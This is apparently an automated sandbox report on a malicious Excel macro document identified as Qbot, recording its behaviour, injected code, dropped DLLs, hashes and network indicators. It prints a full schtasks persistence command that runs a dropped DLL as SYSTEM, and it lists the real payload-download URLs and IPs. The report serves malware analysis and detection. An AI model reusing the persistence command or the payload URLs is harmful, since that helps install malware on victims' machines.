                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1002415B push edx; retf 9_2_1002415F
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_100213F8 push ds; iretd 9_2_10021410
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1006D881 push eax; iretd 9_2_1006D882
                  Source: C:\Windows\SysWOW64\explorer.exe Code function: 17_2_00B0D4B6 push FFFFFF8Ah; iretd 17_2_00B0D50E
                  Source: C:\Windows\SysWOW64\explorer.exe Code function: 17_2_00B0D485 push FFFFFF8Ah; iretd 17_2_00B0D50E
                  Source: C:\Windows\SysWOW64\explorer.exe Code function: 17_2_00B0A00E push ebx; ret 17_2_00B0A00F
                  Source: C:\Windows\SysWOW64\explorer.exe Code function: 17_2_00B09D5C push cs; iretd 17_2_00B09E32
                  Source: C:\Windows\SysWOW64\explorer.exe Code function: 17_2_00B09E5E push cs; iretd 17_2_00B09E32
                  Source: C:\Windows\SysWOW64\explorer.exe Code function: 17_2_00B0BB21 push esi; iretd 17_2_00B0BB26
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1000DFEF LoadLibraryA,GetProcAddress, 9_2_1000DFEF
                  Source: key[1].gif.0.dr Static PE information: real checksum: 0x747d8 should be: 0x79f86
                  Source: test1.test.17.dr Static PE information: real checksum: 0x747d8 should be: 0x807ab
                  Source: test1.test.0.dr Static PE information: real checksum: 0x747d8 should be: 0x79f86

                  Persistence and Installation Behavior:

                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gif
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Datop\test1.test
                  Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Datop\test1.test

                  Boot Survival:

                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00

                  Hooking and other Techniques for Hiding and Protection:

                  Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                  Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 6888 base: DDF380 value: E9 48 69 D1 FF
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4036 Thread sleep count: 186 > 30
                  Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5496 Thread sleep count: 114 > 30
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 7036 Thread sleep time: -80000s >= -30000s
                  Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gif
                  Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1000D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 9_2_1000D061
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1000AEF6 FindFirstFileW,FindNextFileW, 9_2_1000AEF6
                  Source: C:\Windows\SysWOW64\explorer.exe Code function: 17_2_00AFAEF6 FindFirstFileW,FindNextFileW, 17_2_00AFAEF6
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10005F63 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 9_2_10005F63
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1000DFEF LoadLibraryA,GetProcAddress, 9_2_1000DFEF
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1006BF06 mov eax, dword ptr fs:[00000030h] 9_2_1006BF06
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1006BAE5 push dword ptr fs:[00000030h] 9_2_1006BAE5
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1006BDDA mov eax, dword ptr fs:[00000030h] 9_2_1006BDDA
                  Source: C:\Windows\SysWOW64\explorer.exe Code function: 17_2_00AF5A54 RtlAddVectoredExceptionHandler, 17_2_00AF5A54

                  HIPS / PFW / Operating System Protection Evasion:

                  Maps a DLL or memory area into another process
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                  Injects code into the Windows Explorer (explorer.exe)
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 6888 base: AE0000 value: B8
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 6888 base: 9D42D8 value: 00
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 6888 base: 9D51E8 value: 00
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 6888 base: B20000 value: 9C
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Memory written: PID: 6888 base: DDF380 value: E9
                  Yara detected hidden Macro 4.0 in Excel
                  Source: Yara match; File source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls, type: SAMPLE
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: explorer.exe, 00000011.00000002.594010034.0000000003790000.00000002.00020000.sdmp; Binary or memory string: Program Manager
                  Source: explorer.exe, 00000011.00000002.594010034.0000000003790000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000011.00000002.594010034.0000000003790000.00000002.00020000.sdmp; Binary or memory string: Progman
                  Source: explorer.exe, 00000011.00000002.594010034.0000000003790000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\explorer.exe; Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\explorer.exe; Code function: 17_2_00AF31B5 CreateNamedPipeA
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 9_2_100097ED GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z
                  Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 9_2_1000D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW

                  Stealing of Sensitive Information:

                  Yara detected Qbot
                  Source: Yara match; File source: 9.3.regsvr32.exe.33330bf.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 9.2.regsvr32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 17.2.explorer.exe.af0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 17.2.explorer.exe.af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 9.3.regsvr32.exe.33330bf.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000009.00000003.380505097.0000000003320000.00000040.00000001.sdmp, type: MEMORY

                  Remote Access Functionality:

                  Yara detected Qbot
                  Source: Yara match; File source: 9.3.regsvr32.exe.33330bf.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 9.2.regsvr32.exe.10000000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 17.2.explorer.exe.af0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 17.2.explorer.exe.af0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 9.3.regsvr32.exe.33330bf.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000009.00000003.380505097.0000000003320000.00000040.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
                  | Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 213 | Masquerading 11 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
                  | Default Accounts | Scripting 1 | DLL Side-Loading 1 | Scheduled Task/Job 1 | Disable or Modify Tools 1 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
                  | Domain Accounts | Native API 1 | Logon Script (Windows) | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
                  | Local Accounts | Exploitation for Client Execution 33 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 213 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud |
                  | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
                  | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 1 | Cached Domain Credentials | System Information Discovery 15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
                  | External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
                  | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

                  Behavior Graph

                  [Behavior graph image not preserved. Behavior Graph ID: 493727; Sample: SecuriteInfo.com.Exploit.Si...; Startdate: 29/09/2021; Architecture: WINDOWS; Score: 100]
                  Top-level signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Document exploit detected (drops PE files); 9 other signatures
                  EXCEL.EXE: contacted mercanets.com (162.222.225.250, 443, 49752), geit.in (162.251.80.22, 443, 49738) and gillcart.com (199.79.63.251, 443, 49724), each listed as PUBLIC-DOMAIN-REGISTRYUS, United States; dropped C:\Users\user\AppData\Local\...\key[1].gif (PE32); signature: Document exploit detected (UrlDownloadToFile); started three regsvr32.exe processes
                  regsvr32.exe: signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Maps a DLL or memory area into another process; started explorer.exe
                  explorer.exe: dropped C:\Datop\test1.test (PE32); signature: Uses schtasks.exe or at.exe to add and modify task schedules; started schtasks.exe
                  schtasks.exe: started conhost.exe

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  | Source | Detection | Scanner | Label |
                  | SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls | 15% | Virustotal | |
                  | SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls | 22% | ReversingLabs | Document-Excel.Downloader.EncDoc |

                  Dropped Files

                  | Source | Detection | Scanner | Label |
                  | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gif | 100% | Joe Sandbox ML | |
                  | C:\Datop\test1.test | 100% | Joe Sandbox ML | |

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  | Source | Detection | Scanner | Label |
                  | mercanets.com | 0% | Virustotal | |
                  | geit.in | 0% | Virustotal | |
                  | gillcart.com | 0% | Virustotal | |

                  URLs


                  Domains and IPs

                  Contacted Domains

                  | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                  | mercanets.com | 162.222.225.250 | true | false | | unknown |
                  | geit.in | 162.251.80.22 | true | false | | unknown |
                  | gillcart.com | 199.79.63.251 | true | false | | unknown |

                  Contacted URLs

                  | Name | Malicious | Antivirus Detection | Reputation |
                  | https://geit.in/MeOlE9Xxd/key.xml | false | 3%, Virustotal; Avira URL Cloud: safe | unknown |
                  | https://mercanets.com/9DPZqAfZdq5z/key.xml | false | Avira URL Cloud: safe | unknown |
                  | https://gillcart.com/Cdpmoyhr/key.xml | false | Avira URL Cloud: safe | unknown |

                  URLs from Memory and Binaries

                                                                                                                            high
                                                                                                                            https://outlook.office.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                              high
                                                                                                                              https://storage.live.com/clientlogs/uploadlocation91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                high
                                                                                                                                https://outlook.office365.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://webshell.suite.office.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://substrate.office.com/search/api/v1/SearchHistory91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://management.azure.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://login.windows.net/common/oauth2/authorize91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://graph.windows.net/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://api.powerbi.com/beta/myorg/imports91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://devnull.onenote.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ncus.pagecontentsync.91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://messaging.office.com/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://augloop.office.com/v291397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://skyapi.live.net/Activity/91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://clients.config.office.net/user/v1.0/mac91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://dataservice.o365filtering.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://api.cortana.ai91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://onedrive.live.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                                high

                                                                                                                                                                Contacted IPs


                                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.79.63.251 | gillcart.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
162.251.80.22 | geit.in | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
162.222.225.250 | mercanets.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                Analysis ID:493727
                                                                                                                                                                Start date:29.09.2021
                                                                                                                                                                Start time:23:44:43
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 7m 49s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Sample file name:SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                                Number of analysed new started processes analysed:27
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.expl.evad.winXLS@12/4@3/3
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:
                                                                                                                                                                • Successful, ratio: 22.7% (good quality ratio 21.5%)
                                                                                                                                                                • Quality average: 77%
                                                                                                                                                                • Quality standard deviation: 27%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 76%
                                                                                                                                                                • Number of executed functions: 67
                                                                                                                                                                • Number of non-executed functions: 48
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .xls
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer
                                                                                                                                                                Warnings:
                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.199.120.85, 20.82.210.154, 23.211.5.146, 23.211.6.115, 52.109.32.63, 52.109.8.25, 20.199.120.182, 20.54.110.249, 40.112.88.60, 8.248.141.254, 8.253.204.249, 67.27.159.126, 67.26.75.254, 8.248.137.254, 93.184.221.240, 8.238.85.126, 8.248.113.254, 8.241.126.249, 8.238.85.254, 80.67.82.235, 80.67.82.211, 20.199.120.151
                                                                                                                                                                • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, fg.download.windowsupdate.com.c.footprint.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, wu.azureedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, e16646.dscg.akamaiedge.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                No simulations

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

Match | Associated Sample Name / URL | Detection
199.79.63.251 | SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls | malicious
199.79.63.251 | recital-1302341626.xls | malicious
199.79.63.251 | recital-1302341626.xls | malicious
199.79.63.251 | recital-123154428.xls | malicious
199.79.63.251 | recital-123154428.xls | malicious
162.251.80.22 | SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls | malicious
162.251.80.22 | recital-1302341626.xls | malicious
162.251.80.22 | recital-1302341626.xls | malicious
162.251.80.22 | recital-123154428.xls | malicious
162.251.80.22 | recital-123154428.xls | malicious
162.222.225.250 | SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls | malicious
162.222.225.250 | recital-1302341626.xls | malicious
162.222.225.250 | recital-1302341626.xls | malicious
162.222.225.250 | recital-123154428.xls | malicious
162.222.225.250 | recital-123154428.xls | malicious

                                                                                                                                                                                              Domains


ASN


JA3 Fingerprints


Dropped Files

No context

Created / dropped Files

C:\Datop\test1.test
Process:C:\Windows\SysWOW64\explorer.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473006
Entropy (8bit):5.994144001754251
Encrypted:false
SSDEEP:12288:VvT1+i+eRbPqeSIvNMenaJ8rECkSNDopGI5coPYb:Vv3F+ex1MruECBf3oPYb
MD5:278368FD7DC7D1302DC580D367812157
SHA1:09ABAC3BEFF021940C813BD89B657E229BA52625
SHA-256:B1D77E98C39262F39E1C1ABEA5657D55295B25D7E5BD96CFF1F41B7F2C9A5FDC
SHA-512:FD35A602091C33F7E8BFEBC777B9114F5643A4F896B6388D77A0C2BDE7375259C69A5EE4F9964D4FC88B275FAD08D9EC6B9251D8E715E5168C5568A42129FCA7
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):138728
Entropy (8bit):5.360381536028763
Encrypted:false
SSDEEP:1536:ycQIKNZeBdA3gBwfnQ9DQW+z2Y34Zzi7nXboOidX8E6LWME9:BWQ9DQW+zGXh1
MD5:E57A09A0B33F2D9E769DFF2452969F69
SHA1:31E51D5538731C2BD07454D660B566AD14C04791
SHA-256:E53015CC46C85CA20B9B1053EB8369DA384424E051C2994C094ED0CCE399DD81
SHA-512:C20C675D42ABA5F0C99715A24A915E30BC240321F05B14D8C977AB9E5A1A4C6614F124FFB81CB8FF96BF372FFBE60D661E7508C13259608DE47A9E7253F05ACF
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gif
Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):468910
Entropy (8bit):5.986572146199657
Encrypted:false
SSDEEP:12288:avT1+i+eRbPqeSIvNMenaJ8rECkSNDopGI5coPYb:av3F+ex1MruECBf3oPYb
MD5:BB240163D2BA2520EF5BD6003FCA4914
SHA1:9C9446B5C67CFC4645D32748DD90EDD54C365BC5
SHA-256:A5A61A4018D8D68DA99FED20588FFA87526B71909303B8C7FC195E6964355ACD
SHA-512:1D0A014F37AD825AEB866B618E1ADD2CB835710CA7B3082DC1B8F8690F25B4925EA41EFA862F091484DB2F8C76D42B8DC8B047BD4FB7B7278D5EF497E648BCEF
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Sep 29 08:59:46 2021, Security: 0
                                                                                                                                                                                              Entropy (8bit):7.351326128821904
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                              File name:SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls
                                                                                                                                                                                              File size:250368
                                                                                                                                                                                              MD5:7b83b99dace5664b9ab5c0c3882be408
                                                                                                                                                                                              SHA1:4c4893beca92234c023ee2dfff759e155c643ed3
                                                                                                                                                                                              SHA256:e005a59b0ab458c8a1ab6883e17504382bd72d2e9de8eb99c785de520c258c0c
                                                                                                                                                                                              SHA512:49f7f8746555e83d7a52afb63c108597db8510df1e4d0c5b350848d411245b700e012ba09421a39466a487f9450439b7aa4b7fea459c88d90299b3de1289bd24
                                                                                                                                                                                              SSDEEP:6144:iKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgD9fWvcZZdtLq1JOjbwvOMPDslAvS3+Hw7c:n9fVrLmUjbwvrDa33LvfH1WO2

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                              Static OLE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Document Type:OLE
                                                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                                                              OLE File "SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls"

                                                                                                                                                                                              Indicators

                                                                                                                                                                                              Has Summary Info:True
                                                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                                                              Encrypted Document:False
                                                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                                                              Flash Objects Count:
                                                                                                                                                                                              Contains VBA Macros:True

                                                                                                                                                                                              Summary

                                                                                                                                                                                              Code Page:1251
                                                                                                                                                                                              Author:
                                                                                                                                                                                              Last Saved By:
                                                                                                                                                                                              Create Time:2015-06-05 18:19:34
                                                                                                                                                                                              Last Saved Time:2021-09-29 07:59:46
                                                                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                                                                              Security:0

                                                                                                                                                                                              Document Summary

                                                                                                                                                                                              Document Code Page:1251
                                                                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                                                                              Company:
                                                                                                                                                                                              Contains Dirty Links:False
